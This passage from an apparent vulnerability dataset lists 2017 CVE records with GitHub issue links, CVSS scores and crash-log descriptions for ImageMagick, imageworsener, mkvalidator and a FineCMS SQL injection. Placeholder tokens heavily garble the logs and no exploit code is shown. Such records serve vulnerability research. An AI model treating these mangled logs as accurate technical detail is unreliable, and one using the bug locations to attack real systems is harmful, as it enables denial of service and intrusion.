NUMBERTAG b6ff NUMBERTAG PATHTAG NUMBERTAG b6ff NUMBERTAG b6ff NUMBERTAG PATHTAG NUMBERTAG b6ff NUMBERTAG b6ffc NUMBERTAG b6ffc NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG a NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG a NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG c NUMBERTAG b NUMBERTAG aa NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG aa NUMBERTAG b NUMBERTAG ab NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG ab NUMBERTAG b NUMBERTAG ac NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG ac NUMBERTAG b NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG c NUMBERTAG b NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG c NUMBERTAG b NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG c NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG c NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG a NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG a NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG a NUMBERTAG b NUMBERTAG a NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG a NUMBERTAG b NUMBERTAG a NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG dso NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG d NUMBERTAG 
b NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG d NUMBERTAG b NUMBERTAG da NUMBERTAG PATHTAG NUMBERTAG bf NUMBERTAG bf NUMBERTAG stack] APITAG of process memory map. APITAG CHECK failed: PATHTAG \"((\"unable to mmap NUMBERTAG b NUMBERTAG fa4c1 ( PATHTAG NUMBERTAG b NUMBERTAG fe6a9 in APITAG const , int, char const , unsigned long long, unsigned long long) ( PATHTAG NUMBERTAG b NUMBERTAG e NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG be NUMBERTAG b ( PATHTAG NUMBERTAG b NUMBERTAG bf5e9 ( PATHTAG NUMBERTAG b NUMBERTAG f4d NUMBERTAG in __interceptor_posix_memalign ( PATHTAG NUMBERTAG e NUMBERTAG d in APITAG APITAG NUMBERTAG fa NUMBERTAG in APITAG APITAG NUMBERTAG bc in APITAG APITAG NUMBERTAG d in APITAG APITAG NUMBERTAG a NUMBERTAG in APITAG APITAG NUMBERTAG a NUMBERTAG in APITAG APITAG NUMBERTAG f0 in APITAG APITAG NUMBERTAG f0 in APITAG APITAG NUMBERTAG c8 in APITAG APITAG NUMBERTAG bb NUMBERTAG in APITAG APITAG NUMBERTAG ea0ba0 in APITAG APITAG NUMBERTAG fa NUMBERTAG d1 in APITAG APITAG NUMBERTAG e7a in APITAG APITAG NUMBERTAG a in main APITAG NUMBERTAG b6e NUMBERTAG a NUMBERTAG in __libc_start_main ( PATHTAG NUMBERTAG ba ( PATHTAG ) POC URLTAG",
  7939. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  7940. "severity": "MEDIUM",
  7941. "baseScore": 6.5,
  7942. "impactScore": 3.6,
  7943. "exploitabilityScore": 2.8
  7944. },
  7945. {
  7946. "CVE_ID": "CVE-2017-12692",
  7947. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/653",
  7948. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/653",
  7949. "Repo_new": "imagemagick/imagemagick",
  7950. "Issue_Created_At": "2017-08-06T06:10:56Z",
  7951. "description": "memory exhaustion in APITAG PATHTAG magick convert oom APITAG /dev/null NUMBERTAG ERROR: APITAG failed to allocate NUMBERTAG bytes of APITAG NUMBERTAG APITAG memory map follows NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG d NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG ffff NUMBERTAG b2d NUMBERTAG b2e NUMBERTAG b2f NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b3a NUMBERTAG b3b NUMBERTAG b3c NUMBERTAG b3d NUMBERTAG b3e NUMBERTAG b3f NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b4a NUMBERTAG b4b NUMBERTAG b4c NUMBERTAG b4d NUMBERTAG b4e NUMBERTAG b4f NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b5a NUMBERTAG b5ac NUMBERTAG b5c NUMBERTAG b5c NUMBERTAG b5c NUMBERTAG b5c NUMBERTAG b5c NUMBERTAG PATHTAG NUMBERTAG b5c NUMBERTAG b6dfa NUMBERTAG b6dfa NUMBERTAG b6e1e NUMBERTAG PATHTAG NUMBERTAG b6e1e NUMBERTAG b6e1f NUMBERTAG PATHTAG NUMBERTAG b6e1f NUMBERTAG b6e NUMBERTAG PATHTAG NUMBERTAG b6e NUMBERTAG b6e NUMBERTAG PATHTAG NUMBERTAG b6e NUMBERTAG b6e NUMBERTAG PATHTAG NUMBERTAG b6e NUMBERTAG b6e NUMBERTAG PATHTAG NUMBERTAG b6e NUMBERTAG b6fce NUMBERTAG PATHTAG NUMBERTAG b6fce NUMBERTAG b6fd NUMBERTAG PATHTAG NUMBERTAG b6fd NUMBERTAG b6fd NUMBERTAG PATHTAG NUMBERTAG b6fd NUMBERTAG b6fd NUMBERTAG b6fd NUMBERTAG b6fec NUMBERTAG PATHTAG NUMBERTAG b6fec NUMBERTAG b6fed NUMBERTAG PATHTAG NUMBERTAG b6fed NUMBERTAG b6fee NUMBERTAG PATHTAG NUMBERTAG b6fee NUMBERTAG b6ff NUMBERTAG b6ff NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG c NUMBERTAG b NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG d NUMBERTAG b NUMBERTAG e NUMBERTAG b NUMBERTAG e NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b 
NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG c NUMBERTAG b NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG d NUMBERTAG b NUMBERTAG e NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG e NUMBERTAG b NUMBERTAG f NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG f NUMBERTAG b NUMBERTAG f NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG f NUMBERTAG b NUMBERTAG f NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG f NUMBERTAG b NUMBERTAG f NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG f NUMBERTAG b NUMBERTAG fa NUMBERTAG b NUMBERTAG fa NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG c NUMBERTAG b NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG d NUMBERTAG b NUMBERTAG e NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG e NUMBERTAG b NUMBERTAG e NUMBERTAG b NUMBERTAG e NUMBERTAG b NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG d NUMBERTAG b NUMBERTAG f NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG f NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG f NUMBERTAG b NUMBERTAG f NUMBERTAG b NUMBERTAG dso NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG bf NUMBERTAG bf NUMBERTAG stack] APITAG of process memory map. 
APITAG CHECK failed: PATHTAG \"((\"unable to mmap NUMBERTAG b NUMBERTAG d NUMBERTAG c1 ( PATHTAG NUMBERTAG b NUMBERTAG d NUMBERTAG a9 in APITAG const , int, char const , unsigned long long, unsigned long long) ( PATHTAG NUMBERTAG b NUMBERTAG dbe NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b ( PATHTAG NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG cc NUMBERTAG a in __interceptor_malloc ( PATHTAG NUMBERTAG b4eb in APITAG APITAG NUMBERTAG c8 in APITAG APITAG NUMBERTAG bb NUMBERTAG in APITAG APITAG NUMBERTAG ea0ba0 in APITAG APITAG NUMBERTAG fa NUMBERTAG d1 in APITAG APITAG NUMBERTAG e7a in APITAG APITAG NUMBERTAG a in main APITAG NUMBERTAG b6e3ea NUMBERTAG in __libc_start_main ( PATHTAG NUMBERTAG ba ( PATHTAG ) POC URLTAG",
  7952. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  7953. "severity": "MEDIUM",
  7954. "baseScore": 6.5,
  7955. "impactScore": 3.6,
  7956. "exploitabilityScore": 2.8
  7957. },
  7958. {
  7959. "CVE_ID": "CVE-2017-12693",
  7960. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/652",
  7961. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/652",
  7962. "Repo_new": "imagemagick/imagemagick",
  7963. "Issue_Created_At": "2017-08-06T05:40:03Z",
  7964. "description": "memory exhaustion in APITAG in APITAG PATHTAG magick version Version: APITAG NUMBERTAG Q NUMBERTAG i NUMBERTAG FILETAG PATHTAG magick convert oom APITAG FILETAG NUMBERTAG ERROR: APITAG failed to allocate NUMBERTAG a NUMBERTAG a NUMBERTAG bytes of APITAG NUMBERTAG APITAG memory map follows NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG d NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG ffff NUMBERTAG b2d NUMBERTAG b2e NUMBERTAG b2f NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b3a NUMBERTAG b3b NUMBERTAG b3c NUMBERTAG b3d NUMBERTAG b3e NUMBERTAG b3f NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b4a NUMBERTAG b4b NUMBERTAG b4c NUMBERTAG b4d NUMBERTAG b4e NUMBERTAG b4f NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b5a NUMBERTAG b5ae NUMBERTAG b5c NUMBERTAG b5c NUMBERTAG b5c6c NUMBERTAG b5c6c NUMBERTAG b5c6d NUMBERTAG PATHTAG NUMBERTAG b5c6d NUMBERTAG b6e NUMBERTAG b6e NUMBERTAG b6e NUMBERTAG PATHTAG NUMBERTAG b6e NUMBERTAG b6e NUMBERTAG PATHTAG NUMBERTAG b6e NUMBERTAG b6e NUMBERTAG PATHTAG NUMBERTAG b6e NUMBERTAG b6e NUMBERTAG PATHTAG NUMBERTAG b6e NUMBERTAG b6e4a NUMBERTAG PATHTAG NUMBERTAG b6e4a NUMBERTAG b6e4b NUMBERTAG PATHTAG NUMBERTAG b6e4b NUMBERTAG b6ff NUMBERTAG PATHTAG NUMBERTAG b6ff NUMBERTAG b6ff NUMBERTAG PATHTAG NUMBERTAG b6ff NUMBERTAG b6ff NUMBERTAG PATHTAG NUMBERTAG b6ff NUMBERTAG b6ffa NUMBERTAG b6ffa NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b 
NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG a NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG a NUMBERTAG b NUMBERTAG a NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG a NUMBERTAG b NUMBERTAG a NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG a NUMBERTAG b NUMBERTAG aa NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG aa NUMBERTAG b NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG c NUMBERTAG b NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG c NUMBERTAG b NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG c NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG a NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG a NUMBERTAG b NUMBERTAG e NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG e NUMBERTAG b NUMBERTAG f NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG f NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG a NUMBERTAG b NUMBERTAG a NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG f NUMBERTAG b NUMBERTAG f NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG dso NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG d NUMBERTAG b NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG d NUMBERTAG b NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG bfc NUMBERTAG bfc6a NUMBERTAG stack] APITAG of process memory map. 
APITAG CHECK failed: PATHTAG \"((\"unable to mmap NUMBERTAG b NUMBERTAG f NUMBERTAG c1 ( PATHTAG NUMBERTAG b NUMBERTAG fc6a9 in APITAG const , int, char const , unsigned long long, unsigned long long) ( PATHTAG NUMBERTAG b NUMBERTAG e NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG bc NUMBERTAG b ( PATHTAG NUMBERTAG b NUMBERTAG bd5e9 ( PATHTAG NUMBERTAG b NUMBERTAG f2d NUMBERTAG in __interceptor_posix_memalign ( PATHTAG NUMBERTAG e NUMBERTAG b in APITAG APITAG NUMBERTAG e NUMBERTAG b in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG c8 in APITAG APITAG NUMBERTAG bb NUMBERTAG in APITAG APITAG NUMBERTAG ea0ba0 in APITAG APITAG NUMBERTAG fa NUMBERTAG d1 in APITAG APITAG NUMBERTAG e7a in APITAG APITAG NUMBERTAG a in main APITAG NUMBERTAG b6e NUMBERTAG a NUMBERTAG in __libc_start_main ( PATHTAG NUMBERTAG ba ( PATHTAG ) POC: URLTAG",
  7965. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  7966. "severity": "MEDIUM",
  7967. "baseScore": 6.5,
  7968. "impactScore": 3.6,
  7969. "exploitabilityScore": 2.8
  7970. },
  7971. {
  7972. "CVE_ID": "CVE-2017-12774",
  7973. "Issue_Url_old": "https://github.com/yzcrnx/finecms/issues/1",
  7974. "Issue_Url_new": "https://github.com/yzcrnx/finecms/issues/1",
  7975. "Repo_new": "yzcrnx/finecms",
  7976. "Issue_Created_At": "2017-08-09T01:04:59Z",
  7977. "description": "finecms. finecms version NUMBERTAG, in PATHTAG, has a SQL injection in function APITAG ERRORTAG POC: APITAG use APITAG to inject it ERRORTAG",
  7978. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  7979. "severity": "CRITICAL",
  7980. "baseScore": 9.8,
  7981. "impactScore": 5.9,
  7982. "exploitabilityScore": 3.9
  7983. },
  7984. {
  7985. "CVE_ID": "CVE-2017-12779",
  7986. "Issue_Url_old": "https://github.com/Matroska-Org/foundation-source/issues/24",
  7987. "Issue_Url_new": "https://github.com/matroska-org/foundation-source/issues/24",
  7988. "Repo_new": "matroska-org/foundation-source",
  7989. "Issue_Created_At": "2017-08-14T02:21:00Z",
  7990. "description": "Multiple bugs NUMBERTAG the APITAG function in PATHTAG in mkvalidator NUMBERTAG can cause a denial of APITAG pointer dereference and application crash) via a crafted mkv file. ./mkvalidator APITAG debug info: Program received signal SIGSEGV, Segmentation fault NUMBERTAG in APITAG (p NUMBERTAG Id NUMBERTAG Type NUMBERTAG at PATHTAG NUMBERTAG for (i=p APITAG APITAG (gdb) bt NUMBERTAG in APITAG (p NUMBERTAG Id NUMBERTAG Type NUMBERTAG at PATHTAG NUMBERTAG cb NUMBERTAG in APITAG APITAG at APITAG NUMBERTAG cf NUMBERTAG in APITAG APITAG at APITAG NUMBERTAG in main (argc NUMBERTAG arg NUMBERTAG fffffffdf NUMBERTAG at APITAG (gdb) disassemble Dump of assembler code for function APITAG NUMBERTAG APITAG : push %rbp NUMBERTAG APITAG : mov %rsp,%rbp NUMBERTAG APITAG : mov %rdi NUMBERTAG rbp NUMBERTAG b APITAG : mov %rsi NUMBERTAG rbp NUMBERTAG f APITAG : mov %rd NUMBERTAG rbp NUMBERTAG APITAG : mo NUMBERTAG rbp),%ra NUMBERTAG APITAG : shl NUMBERTAG ra NUMBERTAG b APITAG : or NUMBERTAG rbp),%ra NUMBERTAG f APITAG : mov %ra NUMBERTAG rbp NUMBERTAG APITAG : mo NUMBERTAG rbp),%ra NUMBERTAG APITAG : mo NUMBERTAG rax),%ra NUMBERTAG b APITAG : mov %ra NUMBERTAG rbp NUMBERTAG f APITAG : jmp NUMBERTAG APITAG NUMBERTAG APITAG : mo NUMBERTAG rbp),%ra NUMBERTAG APITAG : mo NUMBERTAG rax),%ra NUMBERTAG APITAG : cmp NUMBERTAG rbp),%ra NUMBERTAG d APITAG : jne NUMBERTAG APITAG NUMBERTAG f APITAG : mo NUMBERTAG rbp),%ra NUMBERTAG APITAG : add NUMBERTAG ra NUMBERTAG APITAG : jmp NUMBERTAG a0 APITAG NUMBERTAG APITAG : mo NUMBERTAG rbp),%ra NUMBERTAG d APITAG : mov (%rax),%rax Type APITAG to continue, or q APITAG to quit q Quit (gdb) i r ra NUMBERTAG rb NUMBERTAG rc NUMBERTAG ffff7b NUMBERTAG rd NUMBERTAG rsi NUMBERTAG rdi NUMBERTAG rbp NUMBERTAG fffffffb NUMBERTAG fffffffb NUMBERTAG rsp NUMBERTAG fffffffb NUMBERTAG fffffffb NUMBERTAG r NUMBERTAG e NUMBERTAG r NUMBERTAG fffffffb NUMBERTAG r NUMBERTAG fffffffffffffa NUMBERTAG r NUMBERTAG r NUMBERTAG r NUMBERTAG fffffffdf 
NUMBERTAG r NUMBERTAG r NUMBERTAG rip NUMBERTAG APITAG eflags NUMBERTAG FILETAG",
  7991. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  7992. "severity": "MEDIUM",
  7993. "baseScore": 6.5,
  7994. "impactScore": 3.6,
  7995. "exploitabilityScore": 2.8
  7996. },
  7997. {
  7998. "CVE_ID": "CVE-2017-12804",
  7999. "Issue_Url_old": "https://github.com/jsummers/imageworsener/issues/30",
  8000. "Issue_Url_new": "https://github.com/jsummers/imageworsener/issues/30",
  8001. "Repo_new": "jsummers/imageworsener",
  8002. "Issue_Created_At": "2017-08-06T06:01:53Z",
  8003. "description": "memory exhausted in iwgif_init_screen . PATHTAG imagew oom iwgif_init_screen1 imout/out outfmt png oom iwgif_init_screen1 \u2192 imout/out NUMBERTAG ERROR: APITAG failed to allocate NUMBERTAG eb NUMBERTAG bytes of APITAG NUMBERTAG APITAG memory map follows NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG ffff NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b4a NUMBERTAG b4b NUMBERTAG b4c NUMBERTAG b4d NUMBERTAG b4e NUMBERTAG b4f NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG b5a NUMBERTAG b5b NUMBERTAG b5c NUMBERTAG b5d NUMBERTAG b5d8f NUMBERTAG b6f NUMBERTAG b6f NUMBERTAG b6f3f NUMBERTAG PATHTAG NUMBERTAG b6f3f NUMBERTAG b6f NUMBERTAG PATHTAG NUMBERTAG b6f NUMBERTAG b6f NUMBERTAG PATHTAG NUMBERTAG b6f NUMBERTAG b6f NUMBERTAG PATHTAG NUMBERTAG b6f NUMBERTAG b6f NUMBERTAG PATHTAG NUMBERTAG b6f NUMBERTAG b6f NUMBERTAG PATHTAG NUMBERTAG b6f NUMBERTAG b6f NUMBERTAG b6f NUMBERTAG b6f5f NUMBERTAG PATHTAG NUMBERTAG b6f5f NUMBERTAG b6f NUMBERTAG PATHTAG NUMBERTAG b6f NUMBERTAG b6f NUMBERTAG PATHTAG NUMBERTAG b6f NUMBERTAG b6f NUMBERTAG b6f NUMBERTAG b NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG c NUMBERTAG b NUMBERTAG e NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG e NUMBERTAG b NUMBERTAG f NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG f NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG a NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG a NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG c NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG d NUMBERTAG b NUMBERTAG e NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG e NUMBERTAG b NUMBERTAG f 
NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG f NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG f NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG f NUMBERTAG b NUMBERTAG f NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG f NUMBERTAG b NUMBERTAG f NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG f NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG f NUMBERTAG b NUMBERTAG f NUMBERTAG b NUMBERTAG fc NUMBERTAG b NUMBERTAG fd NUMBERTAG b NUMBERTAG ff NUMBERTAG b NUMBERTAG ff NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG dso NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG a NUMBERTAG PATHTAG NUMBERTAG bfcd NUMBERTAG bfcf NUMBERTAG stack] APITAG of process memory map. APITAG CHECK failed: PATHTAG \"((\"unable to mmap NUMBERTAG b NUMBERTAG a4c1 ( PATHTAG NUMBERTAG b NUMBERTAG e6a9 in APITAG const , int, char const , unsigned long long, unsigned long long) ( PATHTAG NUMBERTAG b NUMBERTAG e NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG e NUMBERTAG b ( PATHTAG NUMBERTAG b NUMBERTAG f NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG a in __interceptor_malloc ( PATHTAG NUMBERTAG in iw_malloc_ex src/imagew APITAG NUMBERTAG in iw_malloc_large src/imagew APITAG NUMBERTAG dee NUMBERTAG in iwgif_init_screen src/imagew APITAG NUMBERTAG dee NUMBERTAG in iwgif_read_image src/imagew APITAG NUMBERTAG e NUMBERTAG c4 in iwgif_read_main src/imagew APITAG NUMBERTAG e NUMBERTAG c4 in iw_read_gif_file src/imagew APITAG NUMBERTAG ad in iwcmd_run src/imagew APITAG NUMBERTAG b0 in iwcmd_main src/imagew APITAG NUMBERTAG a NUMBERTAG a in main src/imagew APITAG NUMBERTAG b6f7ca NUMBERTAG in __libc_start_main ( PATHTAG NUMBERTAG ae2f ( PATHTAG ) POC URLTAG",
  8004. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  8005. "severity": "MEDIUM",
  8006. "baseScore": 6.5,
  8007. "impactScore": 3.6,
  8008. "exploitabilityScore": 2.8
  8009. },
  8010. {
  8011. "CVE_ID": "CVE-2017-12805",
  8012. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/664",
  8013. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/664",
  8014. "Repo_new": "imagemagick/imagemagick",
  8015. "Issue_Created_At": "2017-08-10T05:00:53Z",
